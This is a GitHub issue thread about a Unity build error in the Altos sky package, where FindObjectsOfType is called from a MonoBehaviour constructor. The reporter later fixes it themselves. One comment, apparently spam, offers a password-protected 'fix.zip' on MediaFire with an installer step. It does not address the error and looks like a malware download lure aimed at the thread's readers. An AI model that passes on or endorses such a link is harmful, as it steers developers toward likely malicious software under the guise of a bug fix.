### ISSUE TITLE
Building problem in Altos

### ISSUE THREAD

**Issue by VolkmarPuc** [OccaSoftware/docs#1]
Hello, I would like to change the Altos time in Runtime.
I have the following problem:
When I run the game in the editor everything works fine. But when I want to build the game I get the following error:

UnityException: FindObjectsOfType is not allowed to be called from a MonoBehaviour constructor (or instance field initializer), call it in Awake or Start instead. Called from MonoBehaviour 'AltosManager'.
See "Script Serialization" page in the Unity Manual for further details.
UnityEngine.Object.FindObjectOfType (System.Type type, System.Boolean includeInactive) (at <54724222b7684530a2810ae1eac94ec7>:0)
UnityEngine.Object.FindObjectOfType[T] () (at <54724222b7684530a2810ae1eac94ec7>:0)
OccaSoftware.Altos.Runtime.AltosSkyDirector.get_Instance () (at ./Packages/com.occasoftware.altos/Runtime/Components/AltosSkyDirector.cs:22)
AltosManager..ctor () (at Assets/Scripts/AltosManager.cs:12)

My script is very simple. I can send it to you, if you need it.
Can you please help me how to fix this?

Best regards,
Volkmar

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by VolkmarPuc** [comment]
Hello, I was able to fix the problem myself.

Best regards,
Volkmar
